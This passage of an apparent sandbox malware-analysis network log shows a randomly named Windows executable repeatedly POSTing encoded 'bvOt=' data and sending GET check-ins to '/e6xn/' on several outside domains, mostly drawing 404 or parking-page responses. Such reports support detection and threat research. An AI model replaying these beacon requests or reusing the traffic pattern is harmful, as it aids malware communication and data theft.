                                                                                  17 | 192.168.2.10 | 49733 | 49.0.230.183 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:22.032779932 CET | 736 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.mgn.icu
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.mgn.icu
                                                                                  Referer: http://www.mgn.icu/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=qNMnA4pAqoxkmp0q0uRdXNLuCA3JWBnfO/3p1fQ5b41wI4olBq03P6bHNQ12vIw9cZuIMgyw+SP+7YcWB6wqOQTKeLOE9oO5su76XYnURvct/xfr3LgnYJY3TiuQQX8fkAr6XcKjlelPEFvPLoPvei8I+p4DX3kuR4W5JNhz5uPv10YYkwnB7IrIZdJ0
                                                                                  Mar 18, 2024 14:47:22.337857008 CET | 179 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:47:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/7.0.28
                                                                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                                                                  Data Ascii: File not found.


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  18 | 192.168.2.10 | 49734 | 49.0.230.183 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:24.864581108 CET | 760 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.mgn.icu
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.mgn.icu
                                                                                  Referer: http://www.mgn.icu/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=qNMnA4pAqoxknJkq1JNdeNLtJg3JYhnbO/zp1cdibOFwJYYlAoM3M6bHDw1zy4wAcZr3Mhew+Sr+7cYWANktBgTyLbOG5oO5su76XZC/Rr4t/Bvr2qgoRpYwFSuQa38bkAqZXdWZlcdPEEfPK8joQi8Oy55bX15pU6K9Du9SpeX6yV5f1hGWo/3GXb8er9Oa5G/Mzo47Bjms40XqgQ==
                                                                                  Mar 18, 2024 14:47:25.169032097 CET | 179 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:47:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/7.0.28
                                                                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                                                                  Data Ascii: File not found.


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  19 | 192.168.2.10 | 49735 | 49.0.230.183 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:27.692848921 CET | 1773 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.mgn.icu
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.mgn.icu
                                                                                  Referer: http://www.mgn.icu/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:27.997659922 CET | 179 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:47:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/7.0.28
                                                                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                                                                  Data Ascii: File not found.


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  20 | 192.168.2.10 | 49736 | 49.0.230.183 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:30.526801109 CET | 493 | OUT | GET /e6xn/?bvOt=nPkHDMcb1JQH2fM03fg+aIDrHSSiblzQLJDfzfVFS5dXE5xkefwXFeSdKwFU7agvUteWFQW2j0bTvqR9HNEHAhnYAdzU3M7ag8PlDKnWcqNy6jrKrg==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.mgn.icu
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:30.837378979 CET | 179 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Mon, 18 Mar 2024 13:47:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close
                                                                                  X-Powered-By: PHP/7.0.28
                                                                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                                                                  Data Ascii: File not found.


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  21 | 192.168.2.10 | 49737 | 66.29.152.141 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:36.204870939 CET | 745 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.nikazo.xyz
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.nikazo.xyz
                                                                                  Referer: http://www.nikazo.xyz/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=SIRpP44Cq8RRKyop76eWEXtcSWRPSYwju7oDZI5PvZyCH7SF0O15Mz/kfEJ0Leav48qrk7zVVKv4ltQhne+Woo6mHSmEHbkw53m0XzsK6MXW0fxAdAPxfpa3Q2aDPLcE2/R3vn/NXBPTimK3fcF08yLQ45jy9HaL2V7ylP3R0fnwrcuMmZqNsn+AJv/p
                                                                                  Mar 18, 2024 14:47:36.525033951 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:47:36 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  22 | 192.168.2.10 | 49738 | 66.29.152.141 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:39.612848043 CET | 769 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.nikazo.xyz
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.nikazo.xyz
                                                                                  Referer: http://www.nikazo.xyz/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=SIRpP44Cq8RRMRwp9Y2WTHtfXWRPc4wvu7kDZJtfsvCCJ7iF1MR5CT/kVkJ1WOax48mdk/7VVKr4lsghntmXp46kPymGDbkw53m0Xzow6IDW0vBAcinwSJa0AmaDZ7cA2/QYvibjXHLTiiO3fO9zyyLe1Zi1s1PExVGL/f7rhu3lldPL3ILa/QiOHpKD8yMZUv7QM2xVk5KIHwAVpg==
                                                                                  Mar 18, 2024 14:47:39.918720007 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:47:39 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  23 | 192.168.2.10 | 49739 | 66.29.152.141 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:42.327943087 CET | 1782 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.nikazo.xyz
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.nikazo.xyz
                                                                                  Referer: http://www.nikazo.xyz/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:42.656615019 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:47:42 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  24 | 192.168.2.10 | 49740 | 66.29.152.141 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:45.037863016 CET | 496 | OUT | GET /e6xn/?bvOt=fK5JMP1eyt4jdSIw5YXXC01WYkEietwRjqQFc45Aj4a+GaPHnYBED0rkUElBfcfrwtDI0snSXtvXktZSmOPgjr2IHnyFN7VJ42KSbRcfuNaQ+9lGPw==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.nikazo.xyz
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:45.352355003 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 18 Mar 2024 13:47:45 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  25 | 192.168.2.10 | 49741 | 192.64.119.184 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:50.648511887 CET | 760 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.605alibahis.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.605alibahis.com
                                                                                  Referer: http://www.605alibahis.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=XiKSAmDxjpGxSQGUhyl5f75IXjmKgrm4zZ2V4F9bFAqaQSb4RaGLlu4in3RxKlwsPNwFxxymlzCXh3eJhVsMjpOvarfb2tK9btCMQF0yzyIS2tdX6Hb/bSTK1YXWbKNOWe4JQ0At+qgfBdVmhbNEH76hVkw7dik81iG4UNHHVEO2m5pOcp+zI0cjBXba
                                                                                  Mar 18, 2024 14:47:50.769717932 CET | 214 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 18 Mar 2024 13:47:50 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Location: http://parkingpage.namecheap.com
                                                                                  X-Served-By: Namecheap URL Forward
                                                                                  Server: namecheap-nginx


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  26 | 192.168.2.10 | 49742 | 192.64.119.184 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:53.290654898 CET | 784 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.605alibahis.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.605alibahis.com
                                                                                  Referer: http://www.605alibahis.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=XiKSAmDxjpGxDAWUnTl5Yb5JKTmKqLm8zZyV4EpLFSOaQyL4SeaLgu4ivXR0FFwnPN8nxzmml3SXh2uJhGELi5OtP7fZ7NK9btCMQFQczyQS2+FXrWb8RyTJ94XWIaMmWe5cQ20L+pYfBclmhqNFN764K0xueh9l1xmTN/TKKiuxs4IJN4fkbDAtPRuwPOb2xMf7wemDi1l0a3vd3A==
                                                                                  Mar 18, 2024 14:47:53.411901951 CET | 214 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 18 Mar 2024 13:47:53 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Location: http://parkingpage.namecheap.com
                                                                                  X-Served-By: Namecheap URL Forward
                                                                                  Server: namecheap-nginx


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  27 | 192.168.2.10 | 49743 | 192.64.119.184 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:56.602242947 CET | 1797 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.605alibahis.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.605alibahis.com
                                                                                  Referer: http://www.605alibahis.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:56.722050905 CET | 214 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 18 Mar 2024 13:47:56 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  Location: http://parkingpage.namecheap.com
                                                                                  X-Served-By: Namecheap URL Forward
                                                                                  Server: namecheap-nginx


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  28 | 192.168.2.10 | 49744 | 192.64.119.184 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:47:59.248907089 CET | 501 | OUT | GET /e6xn/?bvOt=agiyDRT46qDSSmihlQ4LWL8xIgO+qfSg1vPRp09QaQzBVRWpSaW3tusYt1FhFwISNvV57xmnsnPpxHCL/G4hmICdRu2qyIf5a9CtW3wt0Qkcp+tj5w==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.605alibahis.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:47:59.372061968 CET | 322 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 18 Mar 2024 13:47:59 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 67
                                                                                  Connection: close
                                                                                  Location: http://parkingpage.namecheap.com
                                                                                  X-Served-By: Namecheap URL Forward
                                                                                  Server: namecheap-nginx
                                                                                  Data Ascii: <a href='http://parkingpage.namecheap.com'>Moved Permanently</a>.


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  29 | 192.168.2.10 | 49745 | 87.236.19.107 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:48:05.006690979 CET | 769 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.pro-ecoproduct.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 193
                                                                                  Origin: http://www.pro-ecoproduct.com
                                                                                  Referer: http://www.pro-ecoproduct.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=nhj6kwhBEWjhtphSONTAuudAcd+onFbx/YHVQXajXVMOLHk/rRebhB2Q6Ko102uJVGlucrJTilkxWLkkPiRNb3qJ71py2Y4VidhhZz2xd3TltUP8tsHjE/gxfnm7mAQuF9rVpR7g2Lg9IzDa8nlg9jfQF5Ash1w2fz13Axw/SR/RZ9EdKoLI94bZ4Lr+
                                                                                  Mar 18, 2024 14:48:05.263274908 CET | 481 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx-reuseport/1.21.1
                                                                                  Date: Mon, 18 Mar 2024 13:48:05 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  30 | 192.168.2.10 | 49746 | 87.236.19.107 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:48:07.754864931 CET | 793 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.pro-ecoproduct.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 217
                                                                                  Origin: http://www.pro-ecoproduct.com
                                                                                  Referer: http://www.pro-ecoproduct.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Data Ascii: bvOt=nhj6kwhBEWjhsJRSLu7A5edHAN+o81b1/YLVQWOJXG4OLl8/qSGbgB2Qyqow6Wu8VGhccvJTilwxWL0kPTROBHqPyVpw444VidhhZzSXd3bltgL8rNHkbPgwenm7iAQqF9qApV6o2Nk9I3LayWljzjebYpBmqGZ4ZBxwEQY+DQizX8lab5qfuPHX2NeUp0ddF5PCgcRzm89VKJhUaA==
                                                                                  Mar 18, 2024 14:48:08.011814117 CET | 481 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx-reuseport/1.21.1
                                                                                  Date: Mon, 18 Mar 2024 13:48:07 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  31 | 192.168.2.10 | 49747 | 87.236.19.107 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:48:10.499604940 CET | 1806 | OUT | POST /e6xn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.pro-ecoproduct.com
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Length: 1229
                                                                                  Origin: http://www.pro-ecoproduct.com
                                                                                  Referer: http://www.pro-ecoproduct.com/e6xn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:48:10.757514954 CET | 481 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx-reuseport/1.21.1
                                                                                  Date: Mon, 18 Mar 2024 13:48:10 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  32 | 192.168.2.10 | 49748 | 87.236.19.107 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Mar 18, 2024 14:48:14.519923925 CET | 504 | OUT | GET /e6xn/?bvOt=qjLanAtLSG+g6YhcGMXKobFEDsC37gbqnajlfmukJF4TH11e5HWV02203YM0+S2fdiE5dYRNrz4LXrhHAApVOWSTzQMTxIdRoLo0SBW6YGOyo1TtwQ==&CVZ=R6q4lTVpfZfT_D HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.pro-ecoproduct.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                  Mar 18, 2024 14:48:14.775660992 CET | 485 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx-reuseport/1.21.1
                                                                                  Date: Mon, 18 Mar 2024 13:48:14 GMT
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Content-Length: 282
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.pro-ecoproduct.com Port 80</address></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  33 | 192.168.2.10 | 49749 | 154.7.21.55 | 80 | 6128 | C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
